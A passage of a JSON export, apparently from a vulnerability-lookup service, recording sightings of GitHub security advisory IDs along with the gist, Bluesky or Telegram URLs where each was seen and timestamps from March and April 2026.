"creation_timestamp": "2026-03-04T18:02:27.683963Z"}, {"uuid": "99e4204f-7774-48e4-a46e-cd3b6ad7c282", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hwx8-q9cg-mqmc", "type": "seen", "source": "https://gist.github.com/alon710/3fd4142edf95384fd65face73227a201", "content": "", "creation_timestamp": "2026-03-09T19:10:06.000000Z"}, {"uuid": "76c02a34-4eeb-4583-b6e0-4ee3ba159d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4CM8-XPFV-JV6F", "type": "seen", "source": "https://gist.github.com/alon710/c2c8edafba318da203fe42ab46df2df5", "content": "", "creation_timestamp": "2026-03-13T11:40:06.000000Z"}, {"uuid": "f09c9118-efd5-4f2e-8e9d-73bdffd4fe29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GWQP-86Q6-W47G", "type": "seen", "source": "https://gist.github.com/alon710/370d29474f012410fa0d3d85c9e8d2da", "content": "", "creation_timestamp": "2026-03-02T22:40:09.000000Z"}, {"uuid": "c3ab1307-bfca-4d83-85e0-905cf1dfb927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9M84-WC28-W895", "type": "seen", "source": "https://gist.github.com/alon710/46efc12781b684d126409a3b14397427", "content": "", "creation_timestamp": "2026-03-05T06:10:05.000000Z"}, {"uuid": "0e1bf491-f208-4884-99ea-a578c7b0180f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ph6w-f82w-28w6", "type": "seen", "source": "https://gist.github.com/hdknr/788d211750014f243a3b9f0c56e7192c", "content": "", "creation_timestamp": "2026-03-05T06:05:02.000000Z"}, {"uuid": "5d04510b-989c-4321-8c39-ece71e96ca72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-83QJ-6FR2-VHQG", "type": "seen", "source": "https://t.me/securixy_kz/1136", "content": "", "creation_timestamp": "2026-07-12T22:00:07.512456Z"}, {"uuid": "a4d5b3fc-a43a-4287-807f-245db230d2f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xw4p-pw82-hqr7", "type": "seen", "source": "https://gist.github.com/alon710/0b0f2721978b5a0277c2bf2492b30919", "content": "", "creation_timestamp": "2026-03-02T23:10:08.000000Z"}, {"uuid": "11995e03-40a0-4a9b-9283-0df3df4c046f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5WP8-Q9MX-8JX8", "type": "seen", "source": "https://gist.github.com/alon710/facbfe8e82c0d1644078a81732ccf4e7", "content": "", "creation_timestamp": "2026-03-05T06:40:05.000000Z"}, {"uuid": "45a21a20-e1b2-4cf2-a5ec-bfb583ce40b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV46-4XFQ-JV58", "type": "seen", "source": "https://gist.github.com/alon710/4137738434f68e99492b7e1f9ad694be", "content": "", "creation_timestamp": "2026-03-02T23:40:09.000000Z"}, {"uuid": "b8eb1eb3-83f6-4d43-aeeb-29fe1f8d981e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F6H3-846H-2R8W", "type": "seen", "source": "https://gist.github.com/alon710/f295c676693170b5c20cb1fc935e8ee8", "content": "", "creation_timestamp": "2026-03-04T19:10:06.000000Z"}, {"uuid": "19f68784-373b-4c1d-80f4-aff9daf06bca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HHJV-JQ77-CMVX", "type": "seen", "source": "https://gist.github.com/alon710/a578e32999e28d2886af7a62f4473f31", "content": "", "creation_timestamp": "2026-03-05T07:10:06.000000Z"}, {"uuid": "b0b6faba-285f-4d40-9bb5-d05d645d99c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hm3f-q6rw-m6wh", "type": "seen", "source": "https://gist.github.com/alon710/60dbc2ed45d457137468c2f1d465c996", "content": "", "creation_timestamp": "2026-03-09T19:40:05.000000Z"}, {"uuid": "3a1e7fe8-5a93-43b2-a1d8-f98e846373df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MWV9-GP5H-FRR4", "type": "seen", "source": "https://gist.github.com/alon710/b0e82af683da479dad48c19fbd03a0f7", "content": "", "creation_timestamp": "2026-03-13T12:40:06.000000Z"}, {"uuid": "39a6c169-18cb-4877-aab8-43f9bead4f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ww6v-v748-x7g9", "type": "seen", "source": "https://gist.github.com/alon710/d8f7cefe7b53d35bef76dc61a6eaa853", "content": "", "creation_timestamp": "2026-03-03T00:10:09.000000Z"}, {"uuid": "9c6a9661-4284-48e4-b76d-fbd3789885b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4486-gxhx-5mg7", "type": "seen", "source": "https://gist.github.com/holt/40a96dc206d10b044099a5bd763c6ffc", "content": "", "creation_timestamp": "2026-03-04T19:50:45.000000Z"}, {"uuid": "7ebb8bd1-2a33-4235-b079-79fa58a280c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RX3G-MVC3-QFJF", "type": "seen", "source": "https://gist.github.com/alon710/7ac7ac6833d08e598a54fcec635175e4", "content": "", "creation_timestamp": "2026-03-03T00:40:08.000000Z"}, {"uuid": "df8d0779-6eef-466d-a2f3-7efbd05560dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JWF4-8WF4-JF2M", "type": "seen", "source": "https://gist.github.com/alon710/8e2631bdd7b6ae6e94b413117e5fb26f", "content": "", "creation_timestamp": "2026-03-04T20:10:05.000000Z"}, {"uuid": "c520930a-1fb9-4729-add6-27cd3ec68b2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-93FX-5QGC-WR38", "type": "seen", "source": "https://gist.github.com/alon710/56622a5fb0d29db6ad09ba417d4e4cd3", "content": "", "creation_timestamp": "2026-03-09T20:10:06.000000Z"}, {"uuid": "82733fdb-b5f9-4f3c-af73-bf869f11fb8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c4p7-rwrg-pf6p", "type": "seen", "source": "https://gist.github.com/alon710/b03cab59ac9b3af949ff7e9d16d01a05", "content": "", "creation_timestamp": "2026-03-12T03:40:05.000000Z"}, {"uuid": "bfbe67c6-24fa-4c4f-9a98-5070d0159aa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7f4q-9rqh-x36p", "type": "seen", "source": "https://gist.github.com/alon710/ed4af6a044e4207183e61d863711d515", "content": "", "creation_timestamp": "2026-03-03T01:10:08.000000Z"}, {"uuid": "e709614c-1362-402f-99bc-3c9ccbfed3d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-crmg-9m86-636r", "type": "seen", "source": "https://gist.github.com/alon710/5abfd0895f336caec9a21c626e6bdcf3", "content": "", "creation_timestamp": "2026-03-04T20:40:05.000000Z"}, {"uuid": "39c0b385-73bc-46a4-af2a-24ffe1161817", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9Q36-67VC-RRWG", "type": "seen", "source": "https://gist.github.com/alon710/0a125c412f2d2b3042221df7022c946c", "content": "", "creation_timestamp": "2026-03-09T20:40:05.000000Z"}, {"uuid": "72f8be87-3d2c-4fed-aeb4-ce2e1dfe1f3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gqc5-xv7m-gcjq", "type": "seen", "source": "https://gist.github.com/alon710/e3dc62168c67266174e7a28a55951177", "content": "", "creation_timestamp": "2026-03-12T04:10:06.000000Z"}, {"uuid": "599a2431-4c1c-4da1-bfc7-c3c6c19b9bbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2fgq-7j6h-9rm4", "type": "seen", "source": "https://gist.github.com/alon710/8e44bef06c4a9145debeba3577194d21", "content": "", "creation_timestamp": "2026-03-03T01:40:09.000000Z"}, {"uuid": "77a712c1-b094-4bc7-9312-a80d6b6a2e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-234q-vvw3-mrfq", "type": "seen", "source": "https://gist.github.com/alon710/9506c04aa0ef623a17fca21dbba79b15", "content": "", "creation_timestamp": "2026-03-04T21:10:05.000000Z"}, {"uuid": "aa740b29-c063-4af6-aa71-97ca060377db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qffp-2rhf-9h96", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mgcqs5sr3l22", "content": "", "creation_timestamp": "2026-03-05T12:00:54.099500Z"}, {"uuid": "494d9da6-8c02-4899-928c-4994f8cd9ffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v359-jj2v-j536", "type": "seen", "source": "https://gist.github.com/alon710/4d9727ddef862a1e929678af12c10073", "content": "", "creation_timestamp": "2026-03-09T21:10:06.000000Z"}, {"uuid": "cbecfd2b-cb6c-4e9d-b7e3-53e9e15b0ba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qh4c-xf7m-gxfc", "type": "seen", "source": "https://gist.github.com/alon710/4d9727ddef862a1e929678af12c10073", "content": "", "creation_timestamp": "2026-03-09T21:10:06.000000Z"}, {"uuid": "e3d25e9b-7d31-485e-a322-795853ccb192", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7vvp-j573-5584", "type": "seen", "source": "https://gist.github.com/alon710/82ec533b20bb9e3d8616b393b125eda2", "content": "", "creation_timestamp": "2026-03-12T04:40:06.000000Z"}, {"uuid": "4adcc10e-6e95-4e47-9409-186db6209091", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R65X-2HQR-J5HF", "type": "seen", "source": "https://gist.github.com/alon710/b1980301960b0266a56628c923a2875f", "content": "", "creation_timestamp": "2026-03-03T02:10:09.000000Z"}, {"uuid": "48573121-84c4-4d6a-b24b-0ecb274c0bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9q2p-vc84-2rwm", "type": "seen", "source": "https://gist.github.com/alon710/c9b7b8cb1e830c7075cb4162b8d49b80", "content": "", "creation_timestamp": "2026-03-09T22:10:06.000000Z"}, {"uuid": "883d82ab-c9e9-476d-a9a8-0f4737e90254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6G25-PC82-VFWP", "type": "seen", "source": "https://gist.github.com/alon710/2a3c7e4817e660cec906b5ff0aca8450", "content": "", "creation_timestamp": "2026-03-03T02:40:08.000000Z"}, {"uuid": "2fae3387-f88b-453b-a9ce-9e0712244878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5HWF-RC88-82XM", "type": "seen", "source": "https://gist.github.com/alon710/740d2628b364f80d93a95763c507d3f8", "content": "", "creation_timestamp": "2026-03-04T22:10:05.000000Z"}, {"uuid": "d074de36-5375-4004-83dc-0b739ed72a68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vh9h-29pq-r5m8", "type": "seen", "source": "https://gist.github.com/alon710/358c252196e7720a9583d07702e8374c", "content": "", "creation_timestamp": "2026-03-13T16:40:06.000000Z"}, {"uuid": "6a8e1a5a-15fd-414c-bbd0-2bfc8059dc1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qffp-2rhf-9h96", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mgfbbadjkq26", "content": "", "creation_timestamp": "2026-03-06T12:00:59.455698Z"}, {"uuid": "4f1475ec-8357-4ad8-847e-bc82df0977c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fpvf-fvp5-996r", "type": "seen", "source": "https://gist.github.com/alon710/98fcddc0acbf6f779dedf7380ef30e3a", "content": "", "creation_timestamp": "2026-03-11T06:10:06.000000Z"}, {"uuid": "dd36a182-e57f-46d0-98a2-4b1a38c751ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3936-cmfr-pm3m", "type": "seen", "source": "https://gist.github.com/alon710/213feea7a4693b5774694763c9a88e80", "content": "", "creation_timestamp": "2026-03-12T20:10:05.000000Z"}, {"uuid": "7baf4a32-1677-405d-a28b-e96ac3b1dc12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M69H-JM2F-2PV8", "type": "seen", "source": "https://gist.github.com/alon710/984a9edb1770e99283ebf3388943b70f", "content": "", "creation_timestamp": "2026-03-14T10:40:06.000000Z"}, {"uuid": "c9709326-4246-4084-b954-0574de827e2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mhg6-2q2v-9h2c", "type": "seen", "source": "https://gist.github.com/alon710/e6746ea37c744f27fa53aba7fbd358d4", "content": "", "creation_timestamp": "2026-03-11T06:40:06.000000Z"}, {"uuid": "1d0942dd-b569-48a3-9060-3167b50ee7bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j96m-mjp6-99xr", "type": "seen", "source": "https://gist.github.com/alon710/3a785f52404818f50d00a5567f60c909", "content": "", "creation_timestamp": "2026-03-12T20:40:05.000000Z"}, {"uuid": "d7713161-488a-49fb-a810-24519945289d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vmhq-cqm9-6p7q", "type": "seen", "source": "https://gist.github.com/alon710/fec06abe0c60c3d8e76294f40a120083", "content": "", "creation_timestamp": "2026-03-14T11:10:05.000000Z"}, {"uuid": "da08d50c-4f73-4368-b9b8-90caa9f8f2cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7H7G-X2PX-94HJ", "type": "seen", "source": "https://gist.github.com/alon710/7bac0b52e4dbe7a8f8d19c17daee0b1e", "content": "", "creation_timestamp": "2026-03-14T13:40:06.000000Z"}, {"uuid": "3a512a65-1192-44e0-809c-6479bdc0d7ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcw-9w9r-pxc7", "type": "seen", "source": "https://gist.github.com/alon710/1475f09f284d480dbb7f0348bae5ca9a", "content": "", "creation_timestamp": "2026-03-11T08:10:05.000000Z"}, {"uuid": "2bb3fa70-0715-40b7-9db5-f59ab0e04239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5wcw-8jjv-m286", "type": "seen", "source": "https://gist.github.com/alon710/0f0bc9cd4afad87103e8849c1243c70d", "content": "", "creation_timestamp": "2026-03-12T21:40:06.000000Z"}, {"uuid": "a4b514fa-516c-4043-8789-270a3ba9ac53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j478-p7vq-3347", "type": "seen", "source": "https://gist.github.com/alon710/e398d8b249a11a97c2a8d7bcec7d275b", "content": "", "creation_timestamp": "2026-03-12T22:10:05.000000Z"}, {"uuid": "36527384-57a5-4974-9a8e-494b0ebd38dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m9pm-w3gv-c68f", "type": "seen", "source": "https://gist.github.com/alon710/513d69d6cc7cbaf7bac9c0b1746fd288", "content": "", "creation_timestamp": "2026-03-12T22:40:05.000000Z"}, {"uuid": "288b7c6c-53d1-43fc-9f26-2f03823a9d13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m48g-4wr2-j2h6", "type": "seen", "source": "https://gist.github.com/alon710/9ef399a547181d8113741f42776f0b40", "content": "", "creation_timestamp": "2026-03-12T23:40:05.000000Z"}, {"uuid": "03e0f6c5-87f1-4d0b-82c0-0747009cec1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g8r9-g2v8-jv6f", "type": "seen", "source": "https://gist.github.com/alon710/4e3441e930710881f9a07d433f110f07", "content": "", "creation_timestamp": "2026-03-06T17:10:06.000000Z"}, {"uuid": "3d7c20e7-7cf4-4a03-989c-97e9c7b5518f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rv39-79c4-7459", "type": "seen", "source": "https://gist.github.com/alon710/ba8dc0788a471b5a92fb9d0637418df7", "content": "", "creation_timestamp": "2026-03-11T12:00:06.000000Z"}, {"uuid": "47af33fa-5e82-4aa5-9438-3d2ca3d8876b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h3rv-q4rq-pqcv", "type": "seen", "source": "https://gist.github.com/alon710/90d4653c1f3204acd98b3c7dd62773cd", "content": "", "creation_timestamp": "2026-03-11T12:10:06.000000Z"}, {"uuid": "6afb4ef9-f150-4590-b2f9-cf86b9cec9c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/alon710/ce76b071b63d3394753200cdb4380331", "content": "", "creation_timestamp": "2026-03-11T12:40:07.000000Z"}, {"uuid": "0dff57ce-9eba-46b7-8374-80f14999cc8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9x5-jp3h-96mm", "type": "seen", "source": "https://gist.github.com/alon710/dd7ce6343fb3c4caed99cdfa0a07695a", "content": "", "creation_timestamp": "2026-03-13T01:50:05.000000Z"}, {"uuid": "08206231-b25d-42a2-8e18-45e3d559eadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5wcw-8jjv-m286", "type": "seen", "source": "https://bsky.app/profile/agentwyre.ai/post/3mhd6txqyqs26", "content": "", "creation_timestamp": "2026-03-18T09:37:39.153511Z"}, {"uuid": "118852b3-4393-4027-9882-b6a569d93e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-573f-x89g-hqp9", "type": "seen", "source": "https://gist.github.com/alon710/19702ece4abcb34c736232a7be14a18b", "content": "", "creation_timestamp": "2026-03-06T18:10:05.000000Z"}, {"uuid": "7a43e4ce-c2c8-4348-9d9f-860b6fc2b37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c9v3-4pv7-87pr", "type": "seen", "source": "https://gist.github.com/alon710/a8817b46e521d68e9ffadb12fd700261", "content": "", "creation_timestamp": "2026-03-06T18:40:06.000000Z"}, {"uuid": "b7b52443-8d83-4b6a-a973-363f3152db29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69fq-xp46-6x23", "type": "seen", "source": "https://bsky.app/profile/topickapp.bsky.social/post/3mhnn2r2h3d2a", "content": "", "creation_timestamp": "2026-03-22T13:18:38.118815Z"}, {"uuid": "132b9fd4-ae28-4ba4-979e-ed425206a808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://gist.github.com/konard/dc529ad3e07305daab99c78bc17d7ea6", "content": "", "creation_timestamp": "2026-04-20T01:05:19.000000Z"}, {"uuid": "01225d2d-e71a-4866-b89d-2eb69bf2d9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r4q5-vmmm-2653", "type": "seen", "source": "https://gist.github.com/konard/dc529ad3e07305daab99c78bc17d7ea6", "content": "", "creation_timestamp": "2026-04-20T01:05:19.000000Z"}, {"uuid": "96bab2b7-2b05-41c0-8dfd-832a0b118aff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p68-rc4w-qgx5", "type": "seen", "source": "https://gist.github.com/konard/dc529ad3e07305daab99c78bc17d7ea6", "content": "", "creation_timestamp": "2026-04-20T01:05:19.000000Z"}, {"uuid": "a3b4cc0a-6685-4d15-bb3c-b3093f3966c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f886-m6hf-6m8v", "type": "seen", "source": "https://gist.github.com/konard/dc529ad3e07305daab99c78bc17d7ea6", "content": "", "creation_timestamp": "2026-04-20T01:05:19.000000Z"}, {"uuid": "85f07d81-0156-45f6-8d5f-cc609f5042af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/734f6575b401a3406f1b0426326d8561", "content": "", "creation_timestamp": "2026-04-11T12:59:57.000000Z"}, {"uuid": "35cb83ca-f49e-4832-bf37-47f6b882d1e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/734f6575b401a3406f1b0426326d8561", "content": "", "creation_timestamp": "2026-04-11T12:59:57.000000Z"}, {"uuid": "cb595924-4e6f-4beb-8948-91f721b27bee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-017", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mjvkrs2bxf2i", "content": "", "creation_timestamp": "2026-04-20T03:49:29.516593Z"}, {"uuid": "21f6b937-832e-4334-877f-ba430111115c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mjbulrf7362m", "content": "", "creation_timestamp": "2026-04-12T07:51:50.076181Z"}, {"uuid": "f120132a-a573-494d-a26b-253261b21cde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69fq-xp46-6x23", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3mhmcnah4ja2t", "content": "", "creation_timestamp": "2026-03-22T00:39:26.212685Z"}, {"uuid": "dd636edd-7d8e-4d8b-9678-55633b4819ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69fq-xp46-6x23", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3mhmdttccr22u", "content": "", "creation_timestamp": "2026-03-22T01:01:00.855128Z"}, {"uuid": "69414681-1cd6-4993-bb67-2aefe0c4c91b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mjdhwymbrv24", "content": "", "creation_timestamp": "2026-04-12T23:10:48.224040Z"}, {"uuid": "2814381d-f4c6-4d77-9d59-cb46854e1a7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rm2p-j3r7-4x4j", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mhmkqalgmj2m", "content": "", "creation_timestamp": "2026-03-22T03:04:17.005925Z"}, {"uuid": "370ab1dc-46dd-4b37-a351-ae51bd873782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vffh-c9pq-4crh", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mhieh5zt7i2u", "content": "", "creation_timestamp": "2026-03-20T11:01:10.334352Z"}, {"uuid": "74f5113c-ccd6-44b1-9fde-8c0407ad68fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m4gv-x78h-3427", "type": "seen", "source": 